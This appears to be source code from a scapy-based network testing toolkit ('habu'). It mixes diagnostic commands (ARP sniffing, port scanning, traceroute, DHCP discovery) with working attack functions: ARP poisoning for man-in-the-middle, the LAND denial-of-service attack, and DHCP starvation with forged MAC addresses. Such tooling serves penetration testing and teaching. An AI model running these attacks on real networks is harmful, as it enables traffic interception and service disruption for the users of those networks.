def cmd_arp_sniff(iface):
"""Listen for ARP packets and show information for each device.
Columns: Seconds from last packet | IP | MAC | Vendor
Example:
\b
1 192.168.0.1 a4:08:f5:19:17:a4 Sagemcom Broadband SAS
7 192.168.0.2 64:bc:0c:33:e5:57 LG Electronics (Mobile Communications)
2 192.168.0.5 00:c2:c6:30:2c:58 Intel Corporate
6 192.168.0.7 54:f2:01:db:35:58 Samsung Electronics Co.,Ltd
"""
conf.verb = False
if iface:
iface = search_iface(iface)
if iface:
conf.iface = iface['name']
else:
logging.error(
'Interface {} not found. Use habu.interfaces to show valid network interfaces'
.format(iface))
return False
print("Waiting for ARP packets...", file=sys.stderr)
sniff(filter="arp", store=False, prn=procpkt)
def cmd_tcp_isn(ip, port, count, iface, graph, verbose):
"""Create TCP connections and print the TCP initial sequence
numbers for each one.
\b
$ sudo habu.tcp.isn -c 5 www.portantier.com
1962287220
1800895007
589617930
3393793979
469428558
Note: You can get a graphical representation (needs the matplotlib package)
using the '-g' option to better understand the randomness.
"""
conf.verb = False
if iface:
iface = search_iface(iface)
if iface:
conf.iface = iface['name']
else:
logging.error(
'Interface {} not found. Use habu.interfaces to show valid network interfaces'
.format(iface))
return False
isn_values = []
for _ in range(count):
pkt = IP(dst=ip) / TCP(sport=RandShort(), dport=port, flags="S")
ans = sr1(pkt, timeout=0.5)
if ans:
send(
IP(dst=ip) / TCP(sport=pkt[TCP].sport,
dport=port,
ack=ans[TCP].seq + 1,
flags='A'))
isn_values.append(ans[TCP].seq)
if verbose:
ans.show2()
if graph:
try:
import matplotlib.pyplot as plt
except ImportError:
print("To graph support, install matplotlib")
return 1
plt.plot(range(len(isn_values)), isn_values, 'ro')
plt.show()
else:
for v in isn_values:
print(v)
return True
def cmd_arp_ping(ip, iface, verbose):
"""
Send ARP packets to check if a host it's alive in the local network.
Example:
\b
# habu.arp.ping 192.168.0.1
Ether / ARP is at a4:08:f5:19:17:a4 says 192.168.0.1 / Padding
"""
if verbose:
logging.basicConfig(level=logging.INFO, format='%(message)s')
conf.verb = False
if iface:
iface = search_iface(iface)
if iface:
conf.iface = iface['name']
else:
logging.error(
'Interface {} not found. Use habu.interfaces to show valid network interfaces'
.format(iface))
return False
res, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip), timeout=2)
for _, pkt in res:
if verbose:
print(pkt.show())
else:
print(pkt.summary())
def cmd_arp_poison(victim1, victim2, iface, verbose):
"""Send ARP 'is-at' packets to each victim, poisoning their
ARP tables for send the traffic to your system.
Note: If you want a full working Man In The Middle attack, you need
to enable the packet forwarding on your operating system to act like a
router. You can do that using:
# echo 1 > /proc/sys/net/ipv4/ip_forward
Example:
\b
# habu.arpoison 192.168.0.1 192.168.0.77
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.70
Ether / ARP is at f4:96:34:e5:ae:1b says 192.168.0.77
...
"""
conf.verb = False
if iface:
iface = search_iface(iface)
if iface:
conf.iface = iface['name']
else:
logging.error(
'Interface {} not found. Use habu.interfaces to show valid network interfaces'
.format(iface))
return False
mac1 = getmacbyip(victim1)
mac2 = getmacbyip(victim2)
pkt1 = Ether(dst=mac1) / ARP(
op="is-at", psrc=victim2, pdst=victim1, hwdst=mac1)
pkt2 = Ether(dst=mac2) / ARP(
op="is-at", psrc=victim1, pdst=victim2, hwdst=mac2)
try:
while 1:
sendp(pkt1)
sendp(pkt2)
if verbose:
pkt1.show2()
pkt2.show2()
else:
print(pkt1.summary())
print(pkt2.summary())
time.sleep(1)
except KeyboardInterrupt:
pass
def cmd_land(ip, count, port, iface, verbose):
"""This command implements the LAND attack, that sends packets forging the
source IP address to be the same that the destination IP. Also uses the
same source and destination port.
The attack is very old, and can be used to make a Denial of Service on
old systems, like Windows NT 4.0. More information here:
https://en.wikipedia.org/wiki/LAND
\b
# sudo habu.land 172.16.0.10
............
Note: Each dot (.) is a sent packet. You can specify how many
packets send with the '-c' option. The default is never stop. Also, you
can specify the destination port, with the '-p' option.
"""
conf.verb = False
if iface:
iface = search_iface(iface)
if iface:
conf.iface = iface['name']
else:
logging.error(
'Interface {} not found. Use habu.interfaces to show valid network interfaces'
.format(iface))
return False
layer3 = IP()
layer3.dst = ip
layer3.src = ip
layer4 = TCP()
layer4.dport = port
layer4.sport = port
pkt = layer3 / layer4
counter = 0
while True:
send(pkt)
counter += 1
if verbose:
print(pkt.summary())
else:
print('.', end='')
sys.stdout.flush()
if count != 0 and counter == count:
break
return True
def cmd_protoscan(ip, iface, timeout, all_protocols, verbose):
"""
Send IP packets with different protocol field content to guess what
layer 4 protocols are available.
The output shows which protocols doesn't generate a 'protocol-unreachable'
ICMP response.
Example:
\b
$ sudo python cmd_ipscan.py 45.77.113.133
1 icmp
2 igmp
4 ipencap
6 tcp
17 udp
41 ipv6
47 gre
50 esp
51 ah
58 ipv6_icmp
97 etherip
112 vrrp
115 l2tp
132 sctp
137 mpls_in_ip
"""
if verbose:
logging.basicConfig(level=logging.INFO, format='%(message)s')
conf.verb = False
if iface:
iface = search_iface(iface)
if iface:
conf.iface = iface['name']
else:
logging.error('Interface {} not found. Use habu.interfaces to show valid network interfaces'.format(iface))
return False
if all_protocols:
protocols = (0,255)
else:
# convert "{name:num}" to {num:name}"
protocols = { num:name for name,num in conf.protocols.__dict__.items() if isinstance(num, int) }
ans,unans=sr(IP(dst=ip, proto=[ int(p) for p in protocols.keys()])/"SCAPY", retry=0, timeout=timeout, verbose=verbose)
allowed_protocols = [ pkt['IP'].proto for pkt in unans ]
for proto in sorted(allowed_protocols):
print('{:<4} {}'.format(proto, protocols[proto])) #conf.protocols._find(str(proto))))
def cmd_gateway_find(network, iface, host, tcp, dport, timeout, verbose):
"""
Try to reach an external IP using any host has a router.
Useful to find routers in your network.
First, uses arping to detect alive hosts and obtain MAC addresses.
Later, create a network packet and put each MAC address as destination.
Last, print the devices that forwarded correctly the packets.
Example:
\b
# habu.find.gateway 192.168.0.0/24
192.168.0.1 a4:08:f5:19:17:a4 Sagemcom
192.168.0.7 b0:98:2b:5d:22:70 Sagemcom
192.168.0.8 b0:98:2b:5d:1f:e8 Sagemcom
"""
if verbose:
logging.basicConfig(level=logging.INFO, format='%(message)s')
conf.verb = False
if iface:
iface = search_iface(iface)
if iface:
conf.iface = iface['name']
else:
logging.error('Interface {} not found. Use habu.interfaces to show valid network interfaces'.format(iface))
return False
res, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=network), timeout=2)
neighbors = set()
for _, pkt in res:
neighbors.add((pkt['Ether'].src, pkt['Ether'].psrc))
for mac,ip in neighbors:
if tcp:
res, unans = srp(Ether(dst=mac)/IP(dst=host)/TCP(dport=dport), timeout=timeout)
else:
res, unans = srp(Ether(dst=mac)/IP(dst=host)/ICMP(), timeout=timeout)
for _,pkt in res:
if pkt:
if verbose:
print(pkt.show())
else:
print(ip, mac, conf.manufdb._get_manuf(mac))
def cmd_traceroute(ip, port, iface):
"""TCP traceroute.
Identify the path to a destination getting the ttl-zero-during-transit messages.
Note: On the internet, you can have various valid paths to a device.
Example:
\b
# habu.traceroute 45.77.113.133
IP / ICMP 192.168.0.1 > 192.168.0.5 time-exceeded ttl-zero-during-transit / IPerror / TCPerror
IP / ICMP 10.242.4.197 > 192.168.0.5 time-exceeded ttl-zero-during-transit / IPerror / TCPerror / Padding
IP / ICMP 200.32.127.98 > 192.168.0.5 time-exceeded ttl-zero-during-transit / IPerror / TCPerror / Padding
.
IP / ICMP 4.16.180.190 > 192.168.0.5 time-exceeded ttl-zero-during-transit / IPerror / TCPerror
.
IP / TCP 45.77.113.133:http > 192.168.0.5:ftp_data SA / Padding
Note: It's better if you use a port that is open on the remote system.
"""
conf.verb = False
if iface:
iface = search_iface(iface)
if iface:
conf.iface = iface['name']
else:
logging.error(
'Interface {} not found. Use habu.interfaces to show valid network interfaces'
.format(iface))
return False
pkts = IP(dst=ip, ttl=(1, 16)) / TCP(dport=port)
for pkt in pkts:
ans = sr1(pkt, timeout=1, iface=conf.iface)
if not ans:
print('.')
continue
print(ans.summary())
if TCP in ans and ans[TCP].flags == 18:
break
return True
def cmd_dhcp_starvation(iface, timeout, sleeptime, verbose):
"""Send multiple DHCP requests from forged MAC addresses to
fill the DHCP server leases.
When all the available network addresses are assigned, the DHCP server don't send responses.
So, some attacks, like DHCP spoofing, can be made.
\b
# habu.dhcp_starvation
Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.6:bootpc / BOOTP / DHCP
Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.7:bootpc / BOOTP / DHCP
Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.8:bootpc / BOOTP / DHCP
"""
conf.verb = False
if iface:
iface = search_iface(iface)
if iface:
conf.iface = iface['name']
else:
logging.error(
'Interface {} not found. Use habu.interfaces to show valid network interfaces'
.format(iface))
return False
conf.checkIPaddr = False
ether = Ether(dst="ff:ff:ff:ff:ff:ff")
ip = IP(src="0.0.0.0", dst="255.255.255.255")
udp = UDP(sport=68, dport=67)
dhcp = DHCP(options=[("message-type", "discover"), "end"])
while True:
bootp = BOOTP(chaddr=str(RandMAC()))
dhcp_discover = ether / ip / udp / bootp / dhcp
ans, unans = srp(dhcp_discover,
timeout=1) # Press CTRL-C after several seconds
for _, pkt in ans:
if verbose:
print(pkt.show())
else:
print(pkt.sprintf(r"%IP.src% offers %BOOTP.yiaddr%"))
sleep(sleeptime)
def cmd_dhcp_discover(iface, timeout, verbose):
"""Send a DHCP request and show what devices has replied.
Note: Using '-v' you can see all the options (like DNS servers) included on the responses.
\b
# habu.dhcp_discover
Ether / IP / UDP 192.168.0.1:bootps > 192.168.0.5:bootpc / BOOTP / DHCP
"""
conf.verb = False
if iface:
iface = search_iface(iface)
if iface:
conf.iface = iface['name']
else:
logging.error('Interface {} not found. Use habu.interfaces to show valid network interfaces'.format(iface))
return False
conf.checkIPaddr = False
hw = get_if_raw_hwaddr(conf.iface)
ether = Ether(dst="ff:ff:ff:ff:ff:ff")
ip = IP(src="0.0.0.0",dst="255.255.255.255")
udp = UDP(sport=68,dport=67)
bootp = BOOTP(chaddr=hw)
dhcp = DHCP(options=[("message-type","discover"),"end"])
dhcp_discover = ether / ip / udp / bootp / dhcp
ans, unans = srp(dhcp_discover, multi=True, timeout=5) # Press CTRL-C after several seconds
for _, pkt in ans:
if verbose:
print(pkt.show())
else:
print(pkt.summary())
def cmd_tcp_scan(ip, port, iface, flags, sleeptime, timeout, show_all,
verbose):
"""TCP Port Scanner.
Print the ports that generated a response with the SYN flag or (if show use -a) all the
ports that generated a response.
It's really basic compared with nmap, but who is comparing?
Example:
\b
# habu.tcp.scan -p 22,23,80,443 -s 1 45.77.113.133
22 S -> SA
80 S -> SA
443 S -> SA
"""
if verbose:
logging.basicConfig(level=logging.INFO, format='%(message)s')
conf.verb = False
if iface:
iface = search_iface(iface)
if iface:
conf.iface = iface['name']
else:
logging.error(
'Interface {} not found. Use habu.interfaces to show valid network interfaces'
.format(iface))
return False
port_regex = r'^[0-9,-]+$'
if not re.match(port_regex, port):
logging.critical("Invalid port specification")
return False
ports = []
for p in str(port).split(','):
if '-' in p:
first, last = p.split('-')
for n in range(int(first), int(last) + 1):
ports.append(n)
else:
ports.append(int(p))
out = "{port} {sflags} -> {rflags}"
pkts = IP(dst=ip) / TCP(flags=flags, dport=ports)
if sleeptime:
res = []
for pkt in pkts:
logging.info(pkt.summary())
_ = sr1(pkt)
if _:
logging.info(_.summary())
res.append((pkt, _))
else:
res, unans = sr(pkts, verbose=verbose)
for s, r in res:
if show_all or 'S' in r.sprintf(r"%TCP.flags%"):
print(
out.format(port=s[TCP].dport,
sflags=s.sprintf(r"%TCP.flags%"),
rflags=r.sprintf(r"%TCP.flags%")))